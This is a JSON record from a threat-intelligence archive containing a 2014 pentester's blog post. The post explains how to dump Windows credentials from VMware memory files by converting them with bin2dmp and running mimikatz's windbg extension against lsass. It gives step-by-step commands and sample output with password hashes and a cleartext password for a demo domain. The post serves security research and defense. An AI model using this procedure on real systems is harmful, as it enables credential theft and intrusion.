{
	"id": "7396aacd-9569-4bd3-93ee-754644c9db31",
	"created_at": "2026-04-06T00:12:14.054658Z",
	"updated_at": "2026-04-10T03:21:13.546284Z",
	"deleted_at": null,
	"sha1_hash": "5e8a1d359dd0e3a17d1d461d691164fdf0d88ed5",
	"title": "Mimikatz Against Virtual Machine Memory Part 1",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 103147,
	"plain_text": "Mimikatz Against Virtual Machine Memory Part 1\r\nBy Ar-themes\r\nArchived: 2026-04-05 22:38:48 UTC\r\nPentesting is a funny thing. Someone will drop some new way of doing something and then you get to reflect on\r\nall those missed opportunities on previous engagements. I remember when MC showed me all the Oracle stuff and\r\nI reminisced about the missed shells.\r\nThis post and part 2 is like that for me. I can't count the number of times i've had access to the folder full of an\r\norganization's virtual machines. I knew you could download the raw disk (vmdk) and use tools like volatility on\r\nthem to carve out useful pieces of the file system but not memory.\r\nWhile doing some research on vCenter/ESXi I  came across a couple of blog posts on the subject:\r\nhttp://www.remkoweijnen.nl/blog/2013/11/25/dumping-passwords-in-a-vmware-vmem-file/\r\nhttp://blog.gentilkiwi.com/securite/mimikatz/windbg-extension\r\nhttp://vniklas.djungeln.se/2013/11/29/password-dump-from-a-hyper-v-virtual-machines-memory/\r\nThis of course sent me down the rabbit hole to see if I could do it.\r\nRemko's post mentions you need a few things:\r\nThe Windows debugging tools:\r\nhttp://www.remkoweijnen.nl/blog/2013/06/13/debugging-tools-for-windows-direct-download/\r\nhttp://blog.gentilkiwi.com/programmes/windbg\r\nThe Windows Memory Toolkit\r\nhttp://www.moonsols.com/windows-memory-toolkit/\r\nCurrent mimikatz that supports the windbg magic\r\nhttps://github.com/gentilkiwi/mimikatz\r\nGotcha #1: The free version of Windows Memory Toolkit limits OS and architecture you can do this on.\r\n Restrictions are 32bit  up to Windows Server 2008.\r\nThe process:\r\n#1 Copy the vmem/vmsn from the remote host\r\n#2 Use moonsols bin2dmp to convert it into a dmp file. (I'm using the for pay version below)\r\nC:\\Users\\user\\Desktop\u003eBin2Dmp.exe \"Windows Server 2008 x64-b2afd86a.vmem\" win2k8.dmp\r\n bin2dmp - v2.1.0.20140115\r\nhttp://carnal0wnage.attackresearch.com/2014/05/mimikatz-against-virtual-machine-memory.html\r\nPage 1 of 5\n\nConvert raw memory dump images into Microsoft crash dump files.\r\nCopyright (C) 2007 - 2014, Matthieu Suiche\r\n Copyright (C) 2012 - 2014, MoonSols Limited\r\nInitializing memory descriptors... Done.\r\nDirectory Table Base is 0x124000\r\nLooking for Kernel Base...\r\nLooking for kernel variables... Done.\r\nLoading file... Done.\r\nnt!KiProcessorBlock.Prcb.Context = 0xFFFFF80001B797A0\r\nstuff happens\r\n [0x0000000040000000 of 0x0000000040000000]  [0x000000001DAFE000 of 0x000000\r\n MD5 = E8C2F318FA528285281C21B3141E7C51\r\nTotal time for the conversion: 0 minutes 14 seconds.\r\nyou should now have a .dmp file you can load into windbg\r\n#3 Load the dmp file into windbg\r\nGotcha #2: You may have to run .symfix and .reload\r\nhttp://carnal0wnage.attackresearch.com/2014/05/mimikatz-against-virtual-machine-memory.html\r\nPage 2 of 5\n\nkd\u003e .symfix\r\nkd\u003e .reload\r\nLoading Kernel Symbols\r\n...............................................................\r\n................................................................\r\n.....\r\nLoading User Symbols\r\nLoading unloaded module list\r\n....\r\n#4 Load the mimilib.dll file\r\nkd\u003e .load C:\\users\\user\\desktop\\mimilib.dll\r\n .#####.  mimikatz 2.0 alpha (x64) release \"Kiwi en C\" (May 25 2014 21:48:13)\r\n.## ^ ##. Windows build 6002\r\n## / \\ ## /* * *\r\n## \\ / ##  Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\r\n'## v ##'  http://blog.gentilkiwi.com/mimikatz       (oe.eo)\r\n '#####'                 WinDBG extension ! * * */\r\n===================================\r\n#     * Kernel mode *     #\r\n===================================\r\n# Search for LSASS process\r\n0: kd\u003e !process 0 0 lsass.exe\r\n# Then switch to its context\r\n0: kd\u003e .process /r /p\r\n# And finally :\r\n0: kd\u003e !mimikatz\r\n===================================\r\n#     * User mode *     #\r\n===================================\r\n0:000\u003e !mimikatz\r\n===================================\r\nThe tool output will walk you through the rest\r\n#5 Find the lsass process\r\nkd\u003e !process 0 0 lsass.exe\r\nPROCESS fffffa800dba26d0\r\n  SessionId: 0 Cid: 023c  Peb: 7fffffd4000 ParentCid: 01e4\r\nhttp://carnal0wnage.attackresearch.com/2014/05/mimikatz-against-virtual-machine-memory.html\r\nPage 3 of 5\n\nDirBase: 2e89f000 ObjectTable: fffff880056562c0 HandleCount: 1092.\r\nImage: lsass.exe\r\n#6 switch to the lsass context fffffa800dba26d0 in this case\r\nkd\u003e .process /r /p fffffa800dba26d0\r\nImplicit process is now fffffa80`0dba26d0\r\nLoading User Symbols\r\n................................................................\r\n......................\r\n#7 Load mimikatz\r\nkd\u003e !mimikatz\r\nAuthentication Id : 0 ; 996 (00000000:000003e4)\r\nSession      : Service from 0\r\nUser Name     : WIN-3C4WXGGN8QE$\r\nDomain      : UNLUCKYCOMPANY\r\nSID        : S-1-5-20\r\nmsv :\r\n[00000002] Primary\r\n* Username : WIN-3C4WXGGN8QE$\r\n* Domain  : UNLUCKYCOMPANY\r\n* NTLM   : ea2ed0b14406a168791adf5aee78fd0b\r\n* SHA1   : ab7bd2f6a64cf857c9d69dd65916622e3dc25424\r\ntspkg : KO\r\n---SNIP---\r\nAuthentication Id : 0 ; 173319 (00000000:0002a507)\r\nSession      : Interactive from 1\r\nUser Name     : Administrator\r\nDomain      : UNLUCKYCOMPANY\r\nSID        : S-1-5-21-2086621178-2413078777-1398328459-500\r\nmsv :\r\n[00000002] Primary\r\n* Username : Administrator\r\n* Domain  : UNLUCKYCOMPANY\r\n* LM    : e52cac67419a9a2238f10713b629b565\r\n* NTLM   : 64f12cddaa88057e06a81b54e73b949b\r\n* SHA1   : cba4e545b7ec918129725154b29f055e4cd5aea8\r\ntspkg :\r\n* Username : Administrator\r\n* Domain  : UNLUCKYCOMPANY\r\n* Password : Password1\r\nhttp://carnal0wnage.attackresearch.com/2014/05/mimikatz-against-virtual-machine-memory.html\r\nPage 4 of 5\n\nwdigest :\r\n* Username : Administrator\r\n* Domain  : UNLUCKYCOMPANY\r\n* Password : Password1\r\nkerberos :\r\n* Username : Administrator\r\n* Domain  : UNLUCKYCOMPANY.NET\r\n* Password : Password1\r\n* Key List\r\n---SNIP---\r\nThere were a few other gotchas for Windows 8 and Windows 2012. I'll put that in part 2.\r\nCG\r\nSource: http://carnal0wnage.attackresearch.com/2014/05/mimikatz-against-virtual-machine-memory.html\r\nhttp://carnal0wnage.attackresearch.com/2014/05/mimikatz-against-virtual-machine-memory.html\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"http://carnal0wnage.attackresearch.com/2014/05/mimikatz-against-virtual-machine-memory.html"
	],
	"report_names": [
		"mimikatz-against-virtual-machine-memory.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434334,
	"ts_updated_at": 1775791273,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5e8a1d359dd0e3a17d1d461d691164fdf0d88ed5.pdf",
		"text": "https://archive.orkl.eu/5e8a1d359dd0e3a17d1d461d691164fdf0d88ed5.txt",
		"img": "https://archive.orkl.eu/5e8a1d359dd0e3a17d1d461d691164fdf0d88ed5.jpg"
	}
}